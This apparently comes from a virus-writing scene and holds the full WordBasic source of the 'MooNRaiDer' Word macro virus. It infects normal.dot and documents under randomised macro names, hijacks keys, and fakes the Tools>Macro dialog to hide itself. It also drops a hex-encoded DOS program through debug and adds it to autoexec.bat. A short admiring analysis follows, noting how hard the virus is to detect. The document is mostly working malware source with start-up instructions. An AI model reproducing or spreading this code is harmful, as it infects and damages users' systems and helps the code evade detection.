GP$ = WindowName$() + ":" + ZUZ$
MacroCopy GP$, "Global:" + K$ 'Copy it to normal.dot.
SetProfileString "Intl", "Name3", K$ 'insert the name into the win.ini
'Copy the ToolsMacro (macro for the english version of word) and the
'ExtrasMakro (macro for the german version of word) to normal.dot.
MacroCopy WindowName$() + ":ToolsMacro", "Global:ToolsMacro"
MacroCopy WindowName$() + ":ExtrasMakro", "Global:ExtrasMakro"
End Sub
Function CheckInstalled 'Is normal.dot infected?
CC$ = GetProfileString$("Intl", "Name") 'Get the macro name.
CheckInstalled = 0 'Set CheckInstalled to 0.
If CountMacros(0) > 0 Then
For i = 1 To CountMacros(0) 'If there any macro's
If MacroName$(i, 0) = CC$ Then 'search the virus macro
CheckInstalled = 1 'If the normal.dot is infected
End If 'CheckInstalled = 1
Next i
End If
End Function
---------------------------------------------------------------------------
Macro SH9272
---------------------------------------------------------------------------
Sub MAIN
On Error Goto Finish 'If there are any error's goto
'end of macro.
A$ = FileName$() 'Is a file open?
If A$ = "" Then Goto Finish 'No, then go to the end.
UZ$ = GetProfileString$("Intl", "Name") 'Get the macro names from
ZU$ = GetProfileString$("Intl", "Name2") 'the win.ini
ZUZ$ = GetProfileString$("Intl", "Name3")
If CheckInstalledDoc = 1 Then 'Is the active file infected?
Goto Finish 'Yes, then goto Finish.
Else
On Error Resume Next
FileSaveAs .Format = 1 'Format the active file to a
Routine '*.dot file.
Crypt 'Now call "Routine", "Crypt",
PayloadMakro 'and "PayloadMakro" and then
FileSaveAll 1, 0 'save all.
End If
Finish:
A$ = FileName$() 'Is a file open?
If A$ = "" Then
Goto Finito 'No, goto end.
Else
Insert "e" 'Yes, then insert a "e" into
End If 'the active file.
Finito:
REM Nothing to do!
Payload_Start:
AK$ = GetProfileString$("Intl", "Name3") 'Get the Payload macro name.
'And start it!
ToolsMacro .Name = AK$, .Run, .Show = 0, .Description = "", .NewName = ""
NO:
End Sub
Sub Crypt
One = 3693
Two = 9917
Num = Int(Rnd() * (Two - One) + One) 'Yeah, and a new numba again.
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Hour(Now()) 'Get the hour again.
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AZ" 'And If it's now 1 o'clock
If B$ = "2" Then C$ = "BY" 'then C$ = "AZ"
If B$ = "3" Then C$ = "CX" 'and so on...
If B$ = "4" Then C$ = "DW"
If B$ = "5" Then C$ = "EV"
If B$ = "6" Then C$ = "FU"
If B$ = "7" Then C$ = "GT"
If B$ = "8" Then C$ = "HS"
If B$ = "9" Then C$ = "IR"
If B$ = "10" Then C$ = "JQ"
If B$ = "11" Then C$ = "KP"
If B$ = "12" Then C$ = "LO"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NM"
If B$ = "15" Then C$ = "OL"
If B$ = "16" Then C$ = "PK"
If B$ = "17" Then C$ = "QJ"
If B$ = "18" Then C$ = "RI"
If B$ = "19" Then C$ = "SH"
If B$ = "20" Then C$ = "TG"
If B$ = "21" Then C$ = "UF"
If B$ = "22" Then C$ = "VE"
If B$ = "23" Then C$ = "WD"
If B$ = "00" Then C$ = "XC"
E$ = C$ + A$
ZU$ = GetProfileString$("Intl", "Name") 'Get the first macro name.
'Copy the macro to the active
'file.
MacroCopy "Global:" + ZU$, WindowName$() + ":" + E$
SetDocumentVar "VirNameDoc", E$ 'the doc variable "VirNameDoc"
'contains the macro name now.
'Prepare a combination between the Key "e" and the macro.
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$, .Add, .Context = 1
End Sub
Sub Routine
One = 7393
Two = 9918
Num = Int(Rnd() * (Two - One) + One) 'And now a new numba.
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Hour(Now()) 'Get the hour again.
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AZ" 'If it's 1 o'clock then
If B$ = "2" Then C$ = "BY" 'C$ = "AZ"
If B$ = "3" Then C$ = "CX" 'and so on...
If B$ = "4" Then C$ = "DW"
If B$ = "5" Then C$ = "EV"
If B$ = "6" Then C$ = "FU"
If B$ = "7" Then C$ = "GT"
If B$ = "8" Then C$ = "HS"
If B$ = "9" Then C$ = "IR"
If B$ = "10" Then C$ = "JQ"
If B$ = "11" Then C$ = "KP"
If B$ = "12" Then C$ = "LO"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NM"
If B$ = "15" Then C$ = "OL"
If B$ = "16" Then C$ = "PK"
If B$ = "17" Then C$ = "QJ"
If B$ = "18" Then C$ = "RI"
If B$ = "19" Then C$ = "SH"
If B$ = "20" Then C$ = "TG"
If B$ = "21" Then C$ = "UF"
If B$ = "22" Then C$ = "VE"
If B$ = "23" Then C$ = "WD"
If B$ = "00" Then C$ = "XC"
D$ = C$ + A$
UZ$ = GetProfileString$("Intl", "Name2") 'Get the second macro name.
'Copy the macro to the active
'file.
MacroCopy "Global:" + UZ$, WindowName$() + ":" + D$
'the doc variable "VirName"
SetDocumentVar "VirName", D$ 'contains the second macro name
'And now prepare a combination between the Backspace Button and the macro.
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 1
End Sub
Sub PayloadMakro
One = 7369
Two = 9299
Num = Int(Rnd() * (Two - One) + One) 'And we need a numba again.
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Hour(Now()) 'the hour, too.
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AZ" 'And if it's 1 o'clock then
If B$ = "2" Then C$ = "BY" 'C$ = "AZ"
If B$ = "3" Then C$ = "CX" 'and so on...
If B$ = "4" Then C$ = "DW"
If B$ = "5" Then C$ = "EV"
If B$ = "6" Then C$ = "FU"
If B$ = "7" Then C$ = "GT"
If B$ = "8" Then C$ = "HS"
If B$ = "9" Then C$ = "IR"
If B$ = "10" Then C$ = "JQ"
If B$ = "11" Then C$ = "KP"
If B$ = "12" Then C$ = "LO"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NM"
If B$ = "15" Then C$ = "OL"
If B$ = "16" Then C$ = "PK"
If B$ = "17" Then C$ = "QJ"
If B$ = "18" Then C$ = "RI"
If B$ = "19" Then C$ = "SH"
If B$ = "20" Then C$ = "TG"
If B$ = "21" Then C$ = "UF"
If B$ = "22" Then C$ = "VE"
If B$ = "23" Then C$ = "WD"
If B$ = "00" Then C$ = "XC"
K$ = C$ + A$
ZUZ$ = GetProfileString$("Intl", "Name3") 'Now we need the third macro name.
'Copy the macro to the active file
MacroCopy "Global:" + ZUZ$, WindowName$() + ":" + K$
'the doc variable "VirNamePayload"
SetDocumentVar "VirNamePayload", K$ 'contains now the third macro name.
'Copy the macro's ToolsMacro and ExtrasMakro to the active file.
MacroCopy "Global:ToolsMacro", WindowName$() + ":ToolsMacro"
MacroCopy "Global:ExtrasMakro", WindowName$() + ":ExtrasMakro"
End Sub
Function CheckInstalledDoc 'Is the active file infected?
On Error Resume Next
CC$ = GetDocumentVar$("VirNameDoc") 'Get the virus macro name.
CheckInstalledDoc = 0 'Set CheckInstalledDoc to 0
If CountMacros(1) > 0 Then
For i = 1 To CountMacros(1) 'There are any macros?
If MacroName$(i, 1) = CC$ Then 'Search the virus macro.
CheckInstalledDoc = 1 'If infected CheckInstalledDoc = 1
End If
Next i
End If
End Function
---------------------------------------------------------------------------
Macro SH8185
---------------------------------------------------------------------------
Sub MAIN
On Error Goto Finish
Install 'Call "Install"
If Month(Now()) = 10 And Day(Now()) = 10 Then
Insert 'Call "Insert"
Else
Goto Finish 'goto end of macro.
End If
Finish:
End Sub
Sub Insert
FileNew .Template = "Normal.dot" 'Create a new file.
DocMaximize 'maximize it.
InsertPara 'insert a empty line.
InsertPara
FontSize 16 'Set Fontsize to 16
Bold
ToggleFull 'Use the whole screen
Insert "You are infected with the MooNRaiDer Virus!"
InsertPara
InsertPara
Insert "Greetings to all members of Vlad!"
InsertPara
InsertPara
Insert "I hope that's not the end!"
InsertPara
InsertPara
Insert "The scene would be to boring without this very good group!"
InsertPara
InsertPara
InsertPara
Insert "Nightmare Joker"
End Sub
Sub Install
B$ = GetProfileString$("Vlad", "Goodbye") 'Is the the virus already installed?
If B$ = "Yes" Then Goto Finish 'Yes, then goto end of macro.
ChDir "C:\" 'change directory
Open "goodbye.scr" For Output As #1 'open the "goodbye.scr" file
Print #1, "N GOODBYE.COM" 'and insert the following lines.
Print #1, "E 0100 2B C0 89 C1 48 2A E8 8B D1 D1 C1 8A D0 F7 F1 F7"
Print #1, "E 0110 F1 F7 F1 F7 F1 F7 F1 49 01 C2 F7 F1 F7 F1 F7 F1"
Print #1, "E 0120 92 BE 00 01 B8 BD 51 CD 21 3D 51 BD 74 53 8C D8"
Print #1, "E 0130 01 D0 8E D8 33 FF 80 3D 5A 75 46 81 6D 03 61 00"
Print #1, "E 0140 81 6D 12 61 00 C6 05 4D 03 45 03 40 8E D8 C6 05"
Print #1, "E 0150 5A C7 45 01 08 00 C7 45 03 60 00 40 06 1F 8E C0"
Print #1, "E 0160 FC 56 B9 5C 03 2E F3 A4 1E 8E D9 8E C0 BE 84 00"
Print #1, "E 0170 BF 3D 01 A5 A5 C7 44 FC 26 01 89 44 FE 1F 1E 07"
Print #1, "E 0180 5E 0E 1F 83 FE 10 72 77 BF 01 01 8B 84 57 03 89"
Print #1, "E 0190 45 FF 8B 84 59 03 89 45 01 8A 84 5B 03 88 45 03"
Print #1, "E 01A0 4F 33 C0 FF E7 47 6F 6F 64 62 79 65 20 65 76 65"
Print #1, "E 01B0 72 79 6F 6E 65 21 0D 0A 56 69 72 75 73 65 73 20"
Print #1, "E 01C0 77 65 72 65 20 66 75 6E 2C 20 62 75 74 20 49 27"
Print #1, "E 01D0 76 65 20 67 6F 74 20 6F 74 68 65 72 20 74 68 69"
Print #1, "E 01E0 6E 67 73 20 49 27 64 20 6C 69 6B 65 20 74 6F 20"
Print #1, "E 01F0 64 6F 0D 0A 51 61 72 6B 2F 56 4C 41 44 0D 0A 8C"
Print #1, "E 0200 C0 05 10 00 2E 01 84 24 01 EB 00 06 1F 05 00 00"
Print #1, "E 0210 8E D0 BC 00 00 33 C0 33 DB 33 C9 33 D2 33 F6 33"
Print #1, "E 0220 FE EA 00 00 00 00 86 C4 3D 51 BD 75 01 CF 3C 4B"
Print #1, "E 0230 74 0F 3C 3D 74 0B 3C 43 74 07 86 C4 EA 00 00 00"
Print #1, "E 0240 00 9C 50 53 51 52 56 57 1E 06 FC 80 FC 6C 74 02"
Print #1, "E 0250 89 D6 0E 07 BF 73 03 B4 60 E8 EF 01 73 03 E9 17"
Print #1, "E 0260 01 0E 1F E8 2E 01 72 F6 BA 73 03 B8 02 3D E8 DA"
Print #1, "E 0270 01 72 EB 93 B4 3F B9 18 00 BA 57 03 E8 CC 01 BE"
Print #1, "E 0280 57 03 B9 02 00 E8 76 01 3D B5 6B 74 5F 3D FA 95"
Print #1, "E 0290 74 5A BE 57 03 B9 05 00 E8 63 01 0B C0 74 45 E8"
Print #1, "E 02A0 E2 00 0B D2 75 3E 3D 00 FA 77 39 3D E9 03 72 34"
Print #1, "E 02B0 50 2D 03 00 A3 53 03 58 05 00 01 A3 22 00 B4 40"
Print #1, "E 02C0 B9 5C 03 33 D2 E8 83 01 72 1A E8 BD 00 BE 52 03"
Print #1, "E 02D0 B9 03 00 E8 28 01 A3 55 03 B4 40 B9 05 00 BA 52"
Print #1, "E 02E0 03 E8 67 01 B4 3E E8 62 01 E9 8C 00 BE 57 03 B9"
Print #1, "E 02F0 14 00 E8 09 01 0B C0 74 EB 83 7C 18 40 74 E5 83"
Print #1, "E 0300 7C 0C FF 75 DF 8B 44 0E A3 0E 01 8B 44 10 A3 13"
Print #1, "E 0310 01 8B 44 14 A3 22 01 8B 44 16 A3 24 01 E8 64 00"
Print #1, "E 0320 B9 10 00 F7 F1 2B 44 08 89 54 14 89 44 16 89 16"
Print #1, "E 0330 22 00 81 C2 F3 05 83 E2 FE 40 89 44 0E 89 54 10"
Print #1, "E 0340 B4 40 B9 5C 03 33 D2 E8 01 01 72 98 E8 35 00 B9"
Print #1, "E 0350 00 02 F7 F1 0B D2 74 01 40 89 44 04 89 54 02 B9"
Print #1, "E 0360 12 00 E8 99 00 89 44 12 E8 1F 00 B4 40 B9 1C 00"
Print #1, "E 0370 89 F2 E8 D6 00 E9 6C FF 07 1F 5F 5E 5A 59 5B 58"
Print #1, "E 0380 9D E9 B6 FE B8 02 42 E9 03 00 B8 00 42 33 C9 99"
Print #1, "E 0390 E8 B8 00 C3 BE 73 03 80 7C 02 2F 74 5F AC 3C 00"
Print #1, "E 03A0 75 FB 4E 89 36 6F 03 FD AC 3C 5C 75 FB FC AD 89"
Print #1, "E 03B0 36 71 03 8B 0E 6F 03 29 F1 E8 42 00 3D D8 0B 74"
Print #1, "E 03C0 3B 3D 7F F0 74 36 3D 88 5E 74 31 3D B2 3C 74 2C"
Print #1, "E 03D0 3D A5 86 74 27 3D 8E BA 74 22 8B 36 6F 03 80 7C"
Print #1, "E 03E0 FC 2E 75 18 83 EE 03 B9 03 00 E8 11 00 3D EB E6"
Print #1, "E 03F0 74 08 3D 05 D1 74 03 E9 02 00 F8 C3 F9 C3 53 51"
Print #1, "E 0400 56 57 E8 1A 00 33 C0 32 FF 8A D8 AC 30 C3 D1 E3"
Print #1, "E 0410 8B 9F F3 03 30 E3 8B C3 E2 ED 5F 5E 59 5B C3 50"
Print #1, "E 0420 51 52 57 BF F3 03 33 C9 33 C0 88 C8 51 B9 08 00"
Print #1, "E 0430 F8 D1 D8 73 03 35 01 A0 E2 F6 89 05 47 47 59 41"
Print #1, "E 0440 81 F9 00 01 75 E2 5F 5A 59 58 C3 9C 2E FF 1E 3D"
Print #1, "E 0450 01 C3 E9 00 00 00 00 CD 20 00 00 00 00 00 00 00"
Print #1, "E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 06F0 00 00 00"
Print #1, "RCX"
Print #1, "05F3"
Print #1, "W"
Print #1, "Q"
Close #1 'And now close the file.
Open "goodbye.bat" For Output As #1 'open now the "goodbye.bat" file
Print #1, "@echo off" 'insert now the following lines.
Print #1, "debug < goodbye.scr > nul"
Print #1, "@echo off"
Print #1, "attrib goodbye.* +h"
Close #1 'Close it!
Shell "goodbye.bat", 0 'start the file now.
On Error Goto Finish
Open "c:\autoexec.bat" For Append As #1 'open the "autoexec.bat" file
Print #1, "@echo off" 'and insert the "Dos" virus name
Print #1, "goodbye.com" 'to start it.
Close #1 'And close it.
SetProfileString "Vlad", "Goodbye", "Yes" 'The virus is now installed.
Finish: 'end of macro.
End Sub
----------------------------------------------------------------------------
Macro ToolsMacro
----------------------------------------------------------------------------
Sub MAIN
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot"
Begin Dialog UserDialog 442, 320, "Macro"
PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2
CancelButton 290, 43, 141, 21
PushButton 290, 72, 141, 21, "&Run", .Definierbar3
PushButton 290, 102, 141, 21, "&Edit", .Definierbar4
PushButton 290, 130, 141, 21, "&Delete", .Definierbar5
PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "Macros &Available In:", .Text1
Text 7, 259, 109, 13, "Descr&iption:", .Text2
Text 7, 6, 93, 13, "Macros:", .Text3
ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1
DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2
End Dialog
Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x
Case 0
Cancel
Case 1
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 2
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 3
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 4
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 5
MsgBox "Not enough memory", "WordBasic Err = 7"
End Select
End Sub
'OK, I know that's not the best solution, but it works and I will improve
'it soon.
----------------------------------------------------------------------------
Macro ExtrasMakro
----------------------------------------------------------------------------
Sub MAIN
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot"
Begin Dialog BenutzerDialog 442, 320, "Makro"
PushButton 290, 14, 141, 21, "Aufz&eichnen...", .Definierbar2
CancelButton 290, 43, 141, 21
PushButton 290, 72, 141, 21, "&Ausf�hren", .Definierbar3
PushButton 290, 102, 141, 21, "&Erstellen", .Definierbar4
PushButton 290, 130, 141, 21, "L�schen...", .Definierbar5
PushButton 290, 166, 141, 21, "&Organisieren...", .Definierbar6
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "&Makros aus:", .Text1
Text 7, 259, 109, 13, "Beschreibung:", .Text2
Text 7, 6, 93, 13, "Makro&name:", .Text3
ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1
DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2
End Dialog
Redim dlg As BenutzerDialog
x = Dialog(dlg)
Select Case x
Case 0
Abbrechen
Case 1
MsgBox "Nicht gen�gend Arbeitsspeicher!", "WordBasic Err = 7"
Case 2
MsgBox "Nicht gen�gend Arbeitsspeicher!", "WordBasic Err = 7"
Case 3
MsgBox "Nicht gen�gend Arbeitsspeicher!", "WordBasic Err = 7"
Case 4
MsgBox "Nicht gen�gend Arbeitsspeicher!", "WordBasic Err = 7"
Case 5
MsgBox "Nicht gen�gend Arbeitsspeicher!", "WordBasic Err = 7"
End Select
End Sub
'A better ToolsMacro and ExtrasMakro box will be here soon.
----------------------------------------------------------------------------
Macro Start => you need this macro only to start the virus
----------------------------------------------------------------------------
'At first you must copy all macros to a new file and start then
'the "start" macro.
Sub MAIN
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "SH8004",
.Add, .Context = 3
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = "SH9272",
.Add, .Context = 3
End Sub
-----------------------------------------------------------------------------
-- NJ --
njoker@hotmail.com
--------------------------------------------------------------
Analysis of a kind of macro virus
OUTLAW (created by Nightmare Joke)
,
By <****{=============-
' AuRoDrEpH, the Drow
--------------------------------------------------------------
This virus was very special :
- no macro (AUTOEXEC, AUTOOPEN or AUTOCLOSE) but it still can infect new files.
interesting thing, no ??
- the name of the 3 macros isn't the same on each infection.
I think that this type of virus isn't easy to detect, so you can use some good idea